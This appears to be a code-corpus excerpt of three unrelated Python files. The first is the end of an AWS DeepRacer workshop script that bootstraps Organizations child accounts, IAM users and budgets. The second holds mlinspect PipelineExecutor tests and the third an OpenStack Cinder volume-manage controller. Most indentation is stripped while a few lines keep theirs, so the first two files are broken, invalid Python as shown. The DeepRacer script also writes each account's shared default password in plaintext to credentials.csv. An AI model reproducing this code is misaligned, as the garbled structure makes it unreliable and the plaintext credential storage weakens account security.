iam_client.detach_user_policy(UserName=iam_user_name,PolicyArn="arn:aws:iam::aws:policy/AWSBillingReadOnlyAccess")
print("Detached AWSBillingReadOnlyAccess from IAM User: {} in account id:{}".format(iam_user_name,account_id))
except iam_client.exceptions.NoSuchEntityException as error:
print("Policy already detached --> Message: {}".format(error))
return
if not exists_iam_user(iam_client,iam_user_name):
iam_client.create_user(UserName=iam_user_name)
print("Created IAM User:{} in account id:{}".format(iam_user_name,account_id))
custom_policy_arn=create_custom_iam_userpolicy(iam_client)
print("Created DeepRacerWorkshopAttendeePolicy in account id:{}".format(account_id))
attach_iam_user_policies(iam_client,iam_user_name,custom_policy_arn)
print("Attached DeepRacerWorkshopAttendeePolicy to IAM User:{} in account id:{}".format(iam_user_name, account_id))
iam_client.create_login_profile(UserName=iam_user_name,Password=default_password,
PasswordResetRequired=True
)
print("Created Login Profile for IAM user: {} in account id:{}".format(iam_user_name,account_id))
else:
update_policies(account_id,iam_user_name,iam_client)
credentialsOperations(account_id,iam_user_name,account_name,default_password)
def credentialsOperations(account_id,iam_user_name,account_name,default_password):
    existsCred = False
    # Guard against the first run, when credentials.csv does not exist yet.
    if os.path.exists('credentials.csv'):
        with open('credentials.csv') as read_file:
            for line in read_file:
                if account_id in line:
                    existsCred = True
                    break
    if not existsCred:
        with open("credentials.csv", "a") as write_file:
            write_file.write("{account_name};https://{account_id}.signin.aws.amazon.com/console;{iam_user_name};{default_password}\n".format(iam_user_name=iam_user_name,account_name=account_name,account_id=account_id,default_password=default_password))
        print("Account id: {} credential written to credentials.csv".format(account_id))
else:
print("Account id: {} credential already exists in credentials.csv".format(account_id))
def create_org_unit(organization_client,source_root_id,ou_name):
paginator = organization_client.get_paginator(
'list_organizational_units_for_parent').paginate(ParentId=source_root_id).build_full_result()
ous = paginator['OrganizationalUnits']
    ou_found = False
org_unit = None
for ou in ous:
if str(ou_name) == str(ou['Name']):
ou_found= True
org_unit = ou
break
if not ou_found:
response = organization_client.create_organizational_unit(
ParentId=source_root_id,
Name=ou_name,
)
print("Organization Unit:{} is created under Root id:{}".format(ou_name,source_root_id))
return response['OrganizationalUnit']
else:
print("Organization Unit:{} is Already exists under Root id:{}".format(ou_name,source_root_id))
return org_unit
def move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name):
paginator = organization_client.get_paginator(
'list_accounts_for_parent').paginate(ParentId=dest_ou_id).build_full_result()
child_accounts = paginator['Accounts']
is_moved = False;
for child_account in child_accounts:
if str(account_name) == str(child_account['Name']):
is_moved= True
break
if not is_moved:
organization_client.move_account(
AccountId=account_id,
SourceParentId=source_root_id,
DestinationParentId=dest_ou_id
)
print("Child Account:{} is moved to organization unit:{}".format(account_id,dest_ou_id))
else:
print("Child Account:{} is Already in organization unit:{}".format(account_id,dest_ou_id))
def set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type=None ):
print("Setting Budget Alert for child account:{}".format(budget_name))
assume_creds = assume_child_credentials(sts_client,account_id)
budgets_client = boto3.client('budgets', region_name=os.environ['AWS_DEFAULT_REGION'] ,
aws_access_key_id=assume_creds['AccessKeyId'],
aws_secret_access_key=assume_creds['SecretAccessKey'],
aws_session_token = assume_creds['SessionToken'])
budget_found= False
count = 0
while True:
if count >= 30:
break
try:
budgets = budgets_client.describe_budgets(AccountId=account_id)['Budgets']
for budget in budgets:
if budget['BudgetName'] == budget_name:
print("Budget: {} is already exists.".format(budget_name))
budget_found = True
break
except KeyError:
budget_found = False
except ClientError as e:
time.sleep(5)
count = count+1
if e.response['Error']['Code'] == 'SubscriptionRequiredException':
print("Trial:{} Failed to call Budget API. It will try again!".format(count,e.response['Error']['Code']))
continue
break
if type == "delete" and budget_found:
print("Budget: {} is exists. It will delete the budget".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
return
if type == "delete" and not budget_found:
print("Budget: {} is NOT exists. No need to delete".format(budget_name))
return
if type == "update" and not budget_found:
print("Budget: {} is NOT exists. No need to update".format(budget_name))
return
if type == "update" and budget_found:
print("Budget: {} is exists. It will be deleted, then re-created".format(budget_name))
budgets_client.delete_budget(AccountId=account_id,BudgetName=budget_name)
budget_found = False
if not budget_found:
print("Budget limit: ${} for budget name:{} will be created".format(amount,budget_name))
response = budgets_client.create_budget(
AccountId=account_id,
Budget={
'BudgetName': budget_name,
'BudgetLimit': {
'Amount': str(amount),
'Unit': 'USD'
},
'CostTypes': {
'IncludeTax': True,
'IncludeSubscription': True,
'UseBlended': False,
'IncludeRefund': True,
'IncludeCredit': True,
'IncludeUpfront': True,
'IncludeRecurring': True,
'IncludeOtherSubscription': True,
'IncludeSupport': True,
'IncludeDiscount': True,
'UseAmortized': True
},
'TimeUnit': 'MONTHLY',
'BudgetType': 'COST'
},
NotificationsWithSubscribers=[
{
'Notification': {
'NotificationType': 'ACTUAL',
'ComparisonOperator': 'GREATER_THAN',
'Threshold': 80,
'ThresholdType': 'PERCENTAGE'
},
'Subscribers': budget_notifier_list
},
]
)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
print("Budget:{} is created under account id: {}".format(budget_name,account_id))
def get_root_id(organization_client):
return organization_client.list_roots()['Roots'][0]['Id']
def parse_args():
parser = argparse.ArgumentParser(description='AWS DeepRacer Account Bootstrap Script', usage='deepracer.py [<args>]')
parser.add_argument(
'-i',
'--input',
metavar="<Input-File-Name>",
nargs=1,
help='Enter the input file name(i.e. emails.csv)',required=True)
parser.add_argument(
'-m',
'--mode',
nargs=1,
help='Type the action you want to run. Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets> ',required=True)
args = parser.parse_args(sys.argv[1:])
return vars(args)
def bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list):
if not account_id:
print("Creating child account: {} under root account".format(account_name))
create_account_response = organization_client.create_account(
Email=email,
AccountName=account_name,
RoleName="OrganizationAccountAccessRole",
IamUserAccessToBilling="DENY"
)
count =0
while True:
describe_account_response = organization_client.describe_create_account_status(
CreateAccountRequestId=create_account_response['CreateAccountStatus']['Id']
)
if describe_account_response['CreateAccountStatus']['State'] == "SUCCEEDED":
print("Child Account: {} is created under root account".format(account_name))
break
time.sleep(3)
count = count +1
if describe_account_response['CreateAccountStatus']['State'] == "FAILED" or count > 20: # 20x3= 60 sec timeout
raise Exception("Problem occurred while creating account id")
child_account_id = get_account_id(organization_client,email)
set_permissions(sts_client,account_name,child_account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,child_account_id)
set_budget_alert_for_child(sts_client,child_account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,child_account_id,source_root_id,dest_ou_id,account_name)
else:
print("Updating permissions for existing child account: {}".format(account_name))
set_permissions(sts_client,account_name,account_id,default_password)
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list)
move_child_accounts_to_org_unit(organization_client,account_id,source_root_id,dest_ou_id,account_name)
def run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client):
print("------")
account_name = email.split('@')[0]
account_id = get_account_id(organization_client, email)
default_password=os.environ.get('DEFAULT_CHILD_ACCOUNT_PASS')
amount = os.environ.get('BUDGET_LIMIT')
if mode == "bootstrap":
bootstrap(account_id,account_name,email,source_root_id,dest_ou_id,organization_client,sts_client,default_password,amount,budget_notifier_list)
elif mode == "update-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="update")
elif mode == "detach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="detach")
elif mode == "attach-policies":
set_permissions(sts_client,account_name,account_id,default_password,type="attach")
elif mode == "update-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list,type="update")
elif mode == "delete-budgets":
budget_name="Budget-Alert-for-{}-{}".format(account_name,account_id)
set_budget_alert_for_child(sts_client,account_id,amount,budget_name,budget_notifier_list, type="delete")
else:
print("No available modes found. Please enter Available modes: <bootstrap, update-policies, attach-policies, detach-policies, update-budgets, delete-budgets>")
exit(1)
if __name__ == '__main__':
args = parse_args()
mode = args.get('mode')[0]
file_name = args.get('input')[0]
check_env_variables()
organization_client = boto3.client('organizations')
sts_client = boto3.client('sts')
budget_notifier_list = [notifier.replace(" ","") for notifier in os.environ.get("BUDGET_NOTIFIERS_LIST").split(',')]
budget_notifier_list = [{'SubscriptionType': 'EMAIL','Address': notifier } for notifier in budget_notifier_list]
if len(budget_notifier_list) > 10:
print("Maximum 10 emails are supported for budget notifier in 'BUDGET_NOTIFIERS_LIST' environment variable.")
exit(1)
ou_name = os.environ.get('OU_NAME')
source_root_id = get_root_id(organization_client)
dest_ou_id= create_org_unit(organization_client,source_root_id,ou_name)['Id']
print("Source root id:'{}', Dest OU ID: '{}' \n".format(source_root_id,dest_ou_id))
emailfile = open(file_name, 'r')
emaillist = [l for l in (line.strip() for line in emailfile) if l]
for email in emaillist:
run_mode(mode,email,budget_notifier_list,source_root_id,dest_ou_id,organization_client,sts_client)
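# Example invocation (hypothetical values; requires AWS Organizations
# management-account credentials in the environment):
#   OU_NAME=deepracer DEFAULT_CHILD_ACCOUNT_PASS='ChangeMe123!' \
#   BUDGET_LIMIT=50 BUDGET_NOTIFIERS_LIST='admin@example.com' \
#   CHILD_ACCOUNT_BILLING_ACCESS=TRUE AWS_DEFAULT_REGION=us-east-1 \
#   python deepracer.py --input emails.csv --mode bootstrap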
| nilq/baby-python | python |
"""
Tests whether the PipelineExecutor works
"""
import os
from inspect import cleandoc
import networkx
from testfixtures import compare
from mlinspect.instrumentation.dag_node import CodeReference
from mlinspect.utils import get_project_root
from mlinspect.instrumentation import pipeline_executor
from ..utils import get_expected_dag_adult_easy_py, get_expected_dag_adult_easy_ipynb, \
get_pandas_read_csv_and_dropna_code
FILE_PY = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.py")
FILE_NB = os.path.join(str(get_project_root()), "test", "pipelines", "adult_easy.ipynb")
def test_pipeline_executor_py_file(mocker):
"""
Tests whether the PipelineExecutor works for .py files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(None, FILE_PY, None, []).dag
expected_dag = get_expected_dag_adult_easy_py()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_nb_file(mocker):
"""
Tests whether the PipelineExecutor works for .ipynb files
"""
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
before_call_used_value_spy = mocker.spy(pipeline_executor, 'before_call_used_value')
before_call_used_args_spy = mocker.spy(pipeline_executor, 'before_call_used_args')
before_call_used_kwargs_spy = mocker.spy(pipeline_executor, 'before_call_used_kwargs')
after_call_used_spy = mocker.spy(pipeline_executor, 'after_call_used')
extracted_dag = pipeline_executor.singleton.run(FILE_NB, None, None, []).dag
expected_dag = get_expected_dag_adult_easy_ipynb()
assert networkx.to_dict_of_dicts(extracted_dag) == networkx.to_dict_of_dicts(expected_dag)
assert before_call_used_value_spy.call_count == 11
assert before_call_used_args_spy.call_count == 15
assert before_call_used_kwargs_spy.call_count == 14
assert after_call_used_spy.call_count == 15
def test_pipeline_executor_function_call_info_extraction():
"""
Tests whether the capturing of module information works
"""
test_code = get_pandas_read_csv_and_dropna_code()
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 34): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
def test_pipeline_executor_function_subscript_index_info_extraction():
"""
    Tests whether the capturing of module information works for subscript accesses
"""
test_code = cleandoc("""
import os
import pandas as pd
from mlinspect.utils import get_project_root
train_file = os.path.join(str(get_project_root()), "test", "data", "adult_train.csv")
raw_data = pd.read_csv(train_file, na_values='?', index_col=0)
data = raw_data.dropna()
data['income-per-year']
""")
pipeline_executor.singleton = pipeline_executor.PipelineExecutor()
pipeline_executor.singleton.run(None, None, test_code, [])
expected_module_info = {CodeReference(5, 13, 5, 85): ('posixpath', 'join'),
CodeReference(5, 26, 5, 49): ('builtins', 'str'),
CodeReference(5, 30, 5, 48): ('mlinspect.utils', 'get_project_root'),
CodeReference(6, 11, 6, 62): ('pandas.io.parsers', 'read_csv'),
CodeReference(7, 7, 7, 24): ('pandas.core.frame', 'dropna'),
CodeReference(8, 0, 8, 23): ('pandas.core.frame', '__getitem__')}
compare(pipeline_executor.singleton.code_reference_to_module, expected_module_info)
| nilq/baby-python | python |
# Copyright (c) 2016 Stratoscale, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.api.contrib import volume_manage as volume_manage_v2
from cinder.api.openstack import wsgi
from cinder import exception
class VolumeManageController(volume_manage_v2.VolumeManageController):
def _ensure_min_version(self, req, allowed_version):
version = req.api_version_request
if not version.matches(allowed_version, None):
raise exception.VersionNotFoundForAPIMethod(version=version)
@wsgi.response(202)
def create(self, req, body):
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).create(req, body)
@wsgi.extends
def index(self, req):
"""Returns a summary list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).index(req)
@wsgi.extends
def detail(self, req):
"""Returns a detailed list of volumes available to manage."""
self._ensure_min_version(req, "3.8")
return super(VolumeManageController, self).detail(req)
def create_resource():
return wsgi.Resource(VolumeManageController())
| nilq/baby-python | python |